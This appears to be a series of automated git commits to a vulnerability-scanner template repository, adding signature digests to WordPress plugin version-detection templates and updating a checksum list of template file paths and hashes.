a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..23e7898281 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022003077b580da7c820c11563f163ad0cce3bad7fcb9f775997be8c55b64c7f3dc40220442b160824cd09f65db8a68e809e8cb9f66e300bfe38ecf88f92de12116e6a2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..e57121a67d 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f2319acf8cb39e01cf47d13cdbb4d8ba87d6ddcbb1c5128577574f2093608a970220095049155a6ed1a936cadc7dcb6225771b700859da00645a7bfa761dae37e289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..760a82e7fd 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f7c05b849903f8e983226de459d5d1d7b1c49d5453d4e3e499a1a31373b4865e0220596d25e676c6412791ffd21e5b674f619f7920b7d55afd730f0ec20be7af808e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 636d9f6cbb382c9fb473fec46c75ec96ac964d51 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 07:38:49 +0000 Subject: [PATCH 1794/1841] Auto Generated New Template Addition List [Thu Aug 1 07:38:49 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 19ef0d4019..576ef8add6 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ http/cves/2022/CVE-2022-27043.yaml http/cves/2023/CVE-2023-44393.yaml +http/cves/2023/CVE-2023-5222.yaml http/cves/2024/CVE-2024-39903.yaml http/cves/2024/CVE-2024-39907.yaml http/cves/2024/CVE-2024-6205.yaml From 0166999097e11fb00f6d03a8d4a60ac1743cdc20 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 07:38:59 +0000 Subject: [PATCH 1795/1841] Auto Generated Templates Checksum [Thu Aug 1 07:38:59 UTC 2024] :robot: --- templates-checksum.txt | 407 +++++++++++++++++++++-------------------- 1 file changed, 204 insertions(+), 203 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c8afd6eb21..1c47a205c4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3355,6 +3355,7 @@ http/cves/2023/CVE-2023-50968.yaml:ba55dd8cde0223755e58c18a48ae9e7a5407aa62 http/cves/2023/CVE-2023-51449.yaml:f17017eea15c6a52827c4f6f17aec59624bfd30a http/cves/2023/CVE-2023-51467.yaml:ca66217bafda2b96c5c17cad532af4bee418699d http/cves/2023/CVE-2023-52085.yaml:8b9252b4ee0f19700fdbf7777b1865551167c2d8 +http/cves/2023/CVE-2023-5222.yaml:8bc7f580ccca2609792ecc60285ec1716d4c2c35 http/cves/2023/CVE-2023-52251.yaml:4ca51f181f6db2932a1254864b5544ae056d8c88 http/cves/2023/CVE-2023-5244.yaml:e8676ea3fe8f5fdbf6a62de0894078ce7445b00d http/cves/2023/CVE-2023-5360.yaml:1914270d0878333c4f7605b7686f1c0ad1c009f8 @@ -3507,7 +3508,7 @@ http/cves/2024/CVE-2024-38289.yaml:fc8b321f6b565cc6feea194cb9265ff81d325e09 http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 http/cves/2024/CVE-2024-39250.yaml:ff485ce5537d94dfd260abb578b3c4d85ecb3797 http/cves/2024/CVE-2024-39903.yaml:5f5e882db1afe8518a20e0edb57150abae54b674 -http/cves/2024/CVE-2024-39907.yaml:cf74b191dfa13bc6ff13ee7a604008a728ed697c +http/cves/2024/CVE-2024-39907.yaml:451e6402d65c267c32597f47c71b31f70efe48c5 http/cves/2024/CVE-2024-39914.yaml:2c8d9d4637d5806823bcba86390d8646d1db66bf http/cves/2024/CVE-2024-40348.yaml:e1b3c7bd1bfe293d155f1999f412eee670c8334b http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 @@ -3538,7 +3539,7 @@ http/cves/2024/CVE-2024-6587.yaml:3b9b74b62b5fee24b9ae9e2138affc55ffabe1d3 http/cves/2024/CVE-2024-6646.yaml:2e73ea26a9329272c114fbee69cc648183fda206 http/cves/2024/CVE-2024-6746.yaml:d4ab2b4730c55e4aa424d56e07cd03f9b2c26859 http/cves/2024/CVE-2024-6922.yaml:83b019597ae43258e9b9b0786304ed398ce3fe14 -http/cves/2024/CVE-2024-7120.yaml:7ce8a36714ff6ef0316679cc10c73edd07e50572 +http/cves/2024/CVE-2024-7120.yaml:1cb58450440b39c5cc43b9254854e957e962dbe8 http/cves/2024/CVE-2024-7188.yaml:5edd2259c08b9141388e13eb5fba2281baa93044 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce @@ -7343,230 +7344,230 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:a7399d933cd777d4e4695fbe2c3a9f4ddbc57148 +http/technologies/wordpress/plugins/add-to-any.yaml:e2f856286ff23eedc328e4f4ba32d7fa48f5cd2b +http/technologies/wordpress/plugins/admin-menu-editor.yaml:83b3d189e29a297c3f41a9c8c08bc3f25b9a2398 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:f4ac6890d2473dcfaf7558ea1bbbc05a12228be1 +http/technologies/wordpress/plugins/akismet.yaml:97eb9b9f4e8b921916a950f79d2134bc8bc1a31b http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0da9a23cd18187d71aa15d93f91a47fb823c4af0 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:74ab97c440b0cd01b4393d10d6c55b6555cd47c8 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:e1b4d915222688cd6167c362ada305ea1fb836fb +http/technologies/wordpress/plugins/amp.yaml:dcbe99091dfa4f849f0e8eeacc903bb134ee3c84 +http/technologies/wordpress/plugins/antispam-bee.yaml:7232d9fe113d3cd34563e8e51ee8c0d21cb0a02c +http/technologies/wordpress/plugins/astra-sites.yaml:bf1d3cacfd76664853a92f305a3945a4573c7b5d http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:2022b022d6aac14e16b2c63991205fd7776d7b53 +http/technologies/wordpress/plugins/backwpup.yaml:c08a26b568e7b18a67ad70353b53d9b673382151 +http/technologies/wordpress/plugins/better-search-replace.yaml:6ee23047ab6ad1f45ac5c5b5bf73963e82108536 +http/technologies/wordpress/plugins/better-wp-security.yaml:51b09a10f8c4ce8d9d6abcd63030a2f0419d91e4 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:2ed755e6dfd670b8e82bc45e826e5ee597dcbfc3 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:a4546d17e59569acda32f2a13969894e2a52e344 +http/technologies/wordpress/plugins/breeze.yaml:2163dac275826a6559cdc1ac3ae95326916ada43 +http/technologies/wordpress/plugins/broken-link-checker.yaml:8fb7380e76769c43157581cc5e77675654ca640b +http/technologies/wordpress/plugins/chaty.yaml:f122378fd2b85d8388f14fb71d0c0fabca7a9bf8 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:cd805effe0104eb403c9b0d9f77c4f48de3118a6 +http/technologies/wordpress/plugins/classic-editor.yaml:d95a3180abfdead614206b4113ffa74d26224ed9 +http/technologies/wordpress/plugins/classic-widgets.yaml:9de68f2a9b76e41888238f36e5d3c6639ea7d807 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:ced77213e30aa52e390722afff58ead2e8d65e5c http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:2597865450d66e10f5f62e44d705e8d69f520f8a +http/technologies/wordpress/plugins/coblocks.yaml:51ebfc0470b7d820e2a21c470053af9b6f826ccc +http/technologies/wordpress/plugins/code-snippets.yaml:8462ae7334b6caecae0a9dc73c2de98a16b71f7d +http/technologies/wordpress/plugins/coming-soon.yaml:99d36a3a1c7c195b91b5a980b5d8e9f66f9162b7 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:7f69cc13f3a9590199bd8d273a026e11be8f54db +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:4bf4e694f89a21a45dd5fb4f7baf4fada18ec952 +http/technologies/wordpress/plugins/contact-form-7.yaml:b399fae9f59c1d4361d56811a81c3e4b89f460d1 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ef1a59d58af3dc001de053d354aaa87e57fd7613 +http/technologies/wordpress/plugins/cookie-law-info.yaml:524dbe469b9c75d077ea555ecf847478a53dfbff +http/technologies/wordpress/plugins/cookie-notice.yaml:dc5f38150b5cfb5e854a6c427a7ad85599444a24 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:e089dc53fe97b7ace17f5fdf59cc076193884dbc +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:a07d07cf4f1f00331d0da2e2d1e8acf54012b6bd +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9da76b827bc9c21d9693b40446b747771e5609ed +http/technologies/wordpress/plugins/custom-css-js.yaml:feeab2964554748054c33cbc0fa66ca4d813f4f0 +http/technologies/wordpress/plugins/custom-fonts.yaml:e2896f53fdb980cae89c91d7c2d2dc0758a16715 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:927a9043a4c4e76809bf2b5509711a89b5c78cf7 +http/technologies/wordpress/plugins/disable-comments.yaml:aff8fa7bcc48c733150065413c2ba1cd3fd9072a +http/technologies/wordpress/plugins/disable-gutenberg.yaml:005b2d00eb96c200e7d2d88f83f56734b3a9c74e +http/technologies/wordpress/plugins/duplicate-page.yaml:5777b971597212a5a65e2563be4a368852a88ed2 +http/technologies/wordpress/plugins/duplicate-post.yaml:553c1f0d1728e363e2b986617c35ee575ac446cf +http/technologies/wordpress/plugins/duplicator.yaml:8a3b14dd7e8a24ed53e48050860ec962179c8ede +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:9e4dfa8503e8d86e7d6094951e508e674813093d http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:422f0b29743abb9c3b4ebbc9ab6c361895c6ffce -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:fac965ff270534808a0659437e09949e27ff9540 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:fe8a5d6aa6cd3c168916b399dc37de957bff9906 +http/technologies/wordpress/plugins/elementor.yaml:7a2af05a487f6b82a842f53c6a0ed29f3ac6cece +http/technologies/wordpress/plugins/elementskit-lite.yaml:091b453088f5bacd8cd7b20b7ee12e6600a3a6f7 +http/technologies/wordpress/plugins/enable-media-replace.yaml:0f060669af6b373303fb7c636a64bc8511581ef8 +http/technologies/wordpress/plugins/envato-elements.yaml:c02673320df7b80c5f77d2464f4bba83148caad0 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1ec19b953e5e74985a792c9fe4884bc69c3e6833 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:e0affef2e5ba688f6841722c11c52c84d53db488 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:b27c15756d36f2be9b43f7a097e23377dba79a33 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:6d2eed5a15209820eaedba6bcbdab2500575cac3 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:0cc49dbf25a0a7d9080e1d4825f6cd6acd6e6834 +http/technologies/wordpress/plugins/flamingo.yaml:d9334baf89094f5b07aab0289a1711dae3a87dd6 +http/technologies/wordpress/plugins/fluent-smtp.yaml:8cc7975c9d2c64a5fca8c4f245384f3fa0c7e51b +http/technologies/wordpress/plugins/fluentform.yaml:b5890bf37c83fab6258b99af8dbe845f07ef3acf +http/technologies/wordpress/plugins/font-awesome.yaml:ae1d599487ce1806ae59df8d827f77a64763c952 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:1cf136d21c4d9bffa36005acdc27fe93ad994a6b +http/technologies/wordpress/plugins/formidable.yaml:bba5b076cdda6a912fb70882016a7094b1fd8d63 +http/technologies/wordpress/plugins/forminator.yaml:0255e9009fd1ca173c4265da830790e42a139579 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:5985945f2db1d0fc626104992092cfdf16922780 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:1af03d5d9ec6b7a6c002d1f6954f5348666a5b66 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:01e2e3c0d2caf4f678bb4071f04cc7fb4e4176c9 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:bbcc873fde4da39550f39b6395864a60c39758d0 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:fc138d7b0fb7edec4e0de898b242708b09668a19 +http/technologies/wordpress/plugins/google-site-kit.yaml:bf36db8a215214bd4ddd7601931c6776dacb73a2 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:b2e49e1c7717e1cef501e0cdf5e0152764924579 +http/technologies/wordpress/plugins/gtranslate.yaml:96a24e8a6e1246b4dff48b1d1345f03b71f94a84 +http/technologies/wordpress/plugins/gutenberg.yaml:1480dd6a8b34b8b48f07f75d0783e8b62658f5e3 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a0d824611e9c9edd4b5616e651def0b9b6f31111 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:aa50d5d2cf10f2040c9992a2c9e0d54468c7773d -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff -http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:2292a9791ea8ddd78dad38753e4fbed1e1ab4452 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:db30cc1831297491ecfe0a6495859713a8dd73f2 +http/technologies/wordpress/plugins/header-footer.yaml:30cc98a13236032dccf14ae2fe99fe9d56f5e266 +http/technologies/wordpress/plugins/health-check.yaml:434ebac02b38d272862e843d279ade097373b116 +http/technologies/wordpress/plugins/hello-dolly.yaml:3b4b29b74ab3a565bee2e0023f89c6be63ea8193 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:3354d989b1b54c87cb6cac5b6f9a7f4bdded0da8 +http/technologies/wordpress/plugins/hostinger.yaml:2a95180c1efd6b15d71f0b2ca683fb36a75afbfc +http/technologies/wordpress/plugins/image-optimization.yaml:72ee4ac163c015ff70c59440d45ca3f4bc7abd6b +http/technologies/wordpress/plugins/imagify.yaml:c19f36223456d930c2940715f493c68faa699df2 +http/technologies/wordpress/plugins/imsanity.yaml:2b1a069beaa1e036742be2329b2533044948ba30 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:5b78c874bc8e513c5e062ce3679f6346e969814d +http/technologies/wordpress/plugins/instagram-feed.yaml:2ae64404253f58a85c83c73c4d812c374ae30a73 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:2ed60428095c8a55e130753280d5e9f71df35ac7 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:069ab1663d472ab9ad8bdb2bf52fba3550dc4e8e +http/technologies/wordpress/plugins/jetpack.yaml:e1101fa99394212f562b374328b038645b03a154 +http/technologies/wordpress/plugins/kadence-blocks.yaml:5938b6f082e8a762c473b0d827c9ef0fe8a319a9 +http/technologies/wordpress/plugins/kirki.yaml:550e62da80eaf424b333b4c23f95c9ca7898a355 +http/technologies/wordpress/plugins/leadin.yaml:3001a916dd806c9cb07802a06c95e50fbb7aab2b +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:7b1fb09276754ba8d686b704eef584c8b4e20e10 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:ddd75bc52ffdabe776c75e1d9bd93925169ae65b +http/technologies/wordpress/plugins/litespeed-cache.yaml:30a73374ed268826fbee1c3859581fd853ae4f7e +http/technologies/wordpress/plugins/loco-translate.yaml:f0b8efaed83163250447a47ad630f860f5dad491 +http/technologies/wordpress/plugins/loginizer.yaml:fbeb31a5764ee6ac44c38bdccec72b662870213a http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 